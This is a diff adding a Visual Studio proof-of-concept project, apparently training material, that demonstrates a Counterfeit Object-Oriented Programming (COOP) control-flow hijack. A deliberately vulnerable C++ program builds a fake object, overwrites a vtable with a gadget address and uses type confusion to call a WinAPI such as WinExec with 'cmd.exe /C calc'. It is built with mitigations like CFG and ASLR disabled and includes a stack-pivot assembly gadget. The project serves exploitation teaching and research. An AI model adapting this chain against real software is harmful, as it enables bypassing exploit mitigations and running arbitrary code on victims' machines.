COOP

COOP-PoC/COOP.sln

@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.32228.343
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cet_poc", "COOP\COOP.vcxproj", "{2FF81FF9-E906-47BE-9808-8C83058B56B5}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{2FF81FF9-E906-47BE-9808-8C83058B56B5}.Debug|x64.ActiveCfg = Debug|x64
+		{2FF81FF9-E906-47BE-9808-8C83058B56B5}.Debug|x64.Build.0 = Debug|x64
+		{2FF81FF9-E906-47BE-9808-8C83058B56B5}.Debug|x86.ActiveCfg = Debug|Win32
+		{2FF81FF9-E906-47BE-9808-8C83058B56B5}.Debug|x86.Build.0 = Debug|Win32
+		{2FF81FF9-E906-47BE-9808-8C83058B56B5}.Release|x64.ActiveCfg = Release|x64
+		{2FF81FF9-E906-47BE-9808-8C83058B56B5}.Release|x64.Build.0 = Release|x64
+		{2FF81FF9-E906-47BE-9808-8C83058B56B5}.Release|x86.ActiveCfg = Release|Win32
+		{2FF81FF9-E906-47BE-9808-8C83058B56B5}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {AD08DE0D-ED6F-494E-9ABB-4A66148BC176}
+	EndGlobalSection
+EndGlobal

COOP-PoC/COOP/COOP.filters

@@ -0,0 +1,25 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="coop.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="guibutton.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>

COOP-PoC/COOP/COOP.user

@@ -0,0 +1,7 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LocalDebuggerCommandArguments>2</LocalDebuggerCommandArguments>
+    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
+  </PropertyGroup>
+</Project>

COOP-PoC/COOP/COOP.vcxproj

@@ -0,0 +1,174 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>16.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{2ff81ff9-e906-47be-9808-8c83058b56b5}</ProjectGuid>
+    <RootNamespace>TypeConfusion</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0.17134.0</WindowsTargetPlatformVersion>
+    <ProjectName>coop</ProjectName>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v143</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level2</WarningLevel>
+      <SDLCheck>false</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <ExceptionHandling>Async</ExceptionHandling>
+      <BasicRuntimeChecks>Default</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <BufferSecurityCheck>false</BufferSecurityCheck>
+      <DebugInformationFormat>OldStyle</DebugInformationFormat>
+      <SupportJustMyCode>false</SupportJustMyCode>
+      <EnableEnhancedInstructionSet />
+      <TreatWChar_tAsBuiltInType>false</TreatWChar_tAsBuiltInType>
+      <ForceConformanceInForLoopScope>true</ForceConformanceInForLoopScope>
+      <RemoveUnreferencedCodeData>false</RemoveUnreferencedCodeData>
+      <ControlFlowGuard>Guard</ControlFlowGuard>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <CETCompat>true</CETCompat>
+      <AdditionalOptions>/DYNAMICBASE:NO %(AdditionalOptions)</AdditionalOptions>
+      <RandomizedBaseAddress>true</RandomizedBaseAddress>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>false</IntrinsicFunctions>
+      <SDLCheck>false</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <Optimization>Disabled</Optimization>
+      <ControlFlowGuard>false</ControlFlowGuard>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <CETCompat>true</CETCompat>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="coop.cpp">
+      <SDLCheck Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</SDLCheck>
+    </ClCompile>
+    <ClCompile Include="offsec.cpp" />
+  </ItemGroup>
+  <ItemGroup>
+    <MASM Include="gadgets.asm" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
+  </ImportGroup>
+</Project>

COOP-PoC/COOP/COOP.vcxproj.user

@@ -0,0 +1,7 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LocalDebuggerCommandArguments>00001e000000 5086014001000000 40610fecfb7f0000 "cmd.exe /C calc"</LocalDebuggerCommandArguments>
+    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
+  </PropertyGroup>
+</Project>

COOP-PoC/COOP/coop.cpp

@@ -0,0 +1,131 @@
+#include <stdio.h>
+#include <errno.h>
+#include <stdlib.h>
+#include <string.h>
+#include <Windows.h>
+#include "offsec.cpp"
+
+
+class Base {};
+class Child : public Base {
+public:
+    virtual void test1();
+};
+
+void* CopyString(char* s) {
+    void* buf = malloc(16);
+    memset(buf, '\x00', 16);
+    memcpy((char*)buf, s, 16);
+    return buf;
+}
+
+void* print_stack_pointer() {
+    DWORD64* p = NULL;
+    return (DWORD64*)&p;
+}
+
+BOOL hexstring_to_bytes(const char* str, BYTE* dest, int dest_size) {
+    int len = (int)strlen(str);
+
+    if ((len / 2) > dest_size) {
+        return FALSE;
+    }
+
+    for (int i = 0; i < len / 2; i++) {
+        int v;
+        if (sscanf_s(str + i * 2, "%2x", &v) != 1)
+            break;
+        dest[i] = (unsigned char)v;
+    }
+    return TRUE;
+}
+
+void print_help(char* argv) {
+    printf("\n[-] SYNTAX:\n");
+    printf("%s <COOP object ptr> <1st vfgadget> <WinAPI> <API argument>\n", argv);
+    printf("\n[-] EXAMPLE - WinExec:\n");
+    printf("%s 00001e000000 5086014001000000 40610fecfb7f0000 \"cmd.exe /C calc\"\n", argv);
+    printf("\n[-] EXAMPLE - LoadLibraryA:\n");
+    printf("%s 00001e000000 5086014001000000 f0040becfb7f0000 \"edgehtml.dll\"\n", argv);
+}
+int main(int argc, char* argv[]) {
+    printf("\n[-] COOP Vulnerable Application PoC\n");
+    printf("[-] handwritten with keys by uf0\n");
+    printf("[-] 2022 - Offensive Security\n");
+
+    if (argc < 5) {
+        print_help(argv[0]);
+        exit(0);
+    }
+    system("pause");
+
+    OffSec imported_class;
+    BYTE vtable_hijack[8];
+    BYTE vfgadget_1[8];
+    BYTE winapi[8];
+
+    //unsigned char vtable_hijack[8];
+    DWORD64 alloc = (DWORD64)0x1e000000;
+    //hexstring_to_bytes(argv[1], vtable_hijack, 8);
+    memcpy((DWORD64*)vtable_hijack,&alloc, 8);
+    hexstring_to_bytes(argv[2], vfgadget_1, 8);
+    hexstring_to_bytes(argv[3], winapi, 8);
+    void* buf = CopyString((char*)vtable_hijack);
+    Child* child2 = static_cast<Child*>(buf);
+
+    //allocating local buffer for variables
+    char* coopbuf = (char*)VirtualAlloc((void*)0x1e000000, 0x8000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+    DWORD64 coop = (DWORD64)(coopbuf);
+    if (coop == NULL) {
+        exit(1);
+    }
+    printf("\n\t\t\t[*] COOP buffer at: \t\t0x%p", coopbuf);
+
+    // setting up COOP chain
+    DWORD64 base  = (DWORD64)(coop + 0x50);       // will be overwritte with OffSec::trigger vfgadget
+    DWORD64 coop0 = (DWORD64)(coop + 0x58);
+    DWORD64 coop1 = (DWORD64)(coop + 0x68);
+    DWORD64 coop2 = (DWORD64)(coop + 0x70);
+    DWORD64 coop3 = (DWORD64)(coop + 0x78);
+    DWORD64 coop4 = (DWORD64)(coop + 0x80);       // vfgadgets function args
+
+    DWORD index = 0;
+    memcpy((DWORD64*)coop + index, &base, 8); 
+    index += 8;
+    memcpy((DWORD64*)coop + index, &coop0, 8);
+    index += 8;
+    memcpy((DWORD64*)coop + index, &coop1, 8);
+    index += 8;
+    memcpy((DWORD64*)coop + index, &coop2, 8);
+    index += 8;
+    memcpy((DWORD64*)coop + index, &coop3, 8);
+    index += 8;
+    memcpy((DWORD64*)coop + index, &coop4, 8);
+
+    // vtable hijack
+    int* ptr_vtable_hijack = (int*)vtable_hijack;
+    DWORD64 vtable_address = *ptr_vtable_hijack;
+    memcpy((DWORD64*)(vtable_address), (DWORD64*)vfgadget_1, 8);
+
+    // retrieving this_ptr via leaked stack
+    DWORD64 stack_ptr_leak = (DWORD64)print_stack_pointer();
+    printf("\n\t\t\t[*] leaked stack pointer: \t0x%p\n", (PDWORD64)stack_ptr_leak);
+    DWORD64* stack_offset = (DWORD64*)(stack_ptr_leak + 0x70);
+    DWORD64* this_ptr = (DWORD64*)(*stack_offset);
+    DWORD64 function_call = (DWORD64)this_ptr + 0x10;
+    DWORD64 function_arg = (DWORD64)this_ptr + 0x8;
+
+    // crafting fake COOP object argument
+    memcpy((PDWORD64*)(function_call), (DWORD64*)winapi, 8);    //WinAPI
+    *(DWORD64*)function_arg = 0x1e000080;
+    DWORD64* hijacked = (DWORD64*)0x1e000080;                     //Argument  
+    strcpy((char*)(hijacked), argv[4]);
+
+    // triggering type confusion
+    printf("\t\t\t[*] hijacking flow control: ");
+    child2->test1();
+    printf("\tOK\n");
+    free(buf);
+    return 0;
+}

COOP-PoC/COOP/gadgets.asm

@@ -0,0 +1,9 @@
+PUBLIC Gadgets
+
+.code 
+Gadgets proc
+    xchg rax, rsp
+    ret
+Gadgets endp
+
+END